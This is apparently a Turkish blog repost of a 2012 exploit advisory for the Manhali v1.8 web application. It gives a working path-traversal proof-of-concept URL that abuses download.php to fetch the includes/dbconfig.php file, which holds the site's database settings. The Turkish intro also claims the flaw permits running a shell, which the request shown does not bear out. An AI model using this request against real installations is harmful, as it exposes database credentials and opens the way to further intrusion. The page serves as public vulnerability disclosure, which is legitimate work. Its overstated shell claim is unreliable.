Manhali v1.8 Local File Inclusion Vulnerability

Manhali v1.8 Local File Inclusion Vulnerability

Manhali v1.8 includes/dbconfig.php de Local File inclusion açığı bulundu. Bu açık sayesinde local üzerinden yapılan bağlantılarla shell çalıştırmak mümküm.

 

############################################
### Exploit Title: Manhali v1.8 Local File Inclusion Vulnerability
### Date: 20/09/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### /projects/manhali/files/manhali_1.8.zip/download
### Version : 1.8 ( may be old version is affect! i don't check )
### Tested on: Linux/Windows
############################################

# P.O.C :

http://127.0.0.1/manhali/includes/download.php?f=../includes/dbconfig.php

############################################

# Greetz to my friendz

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir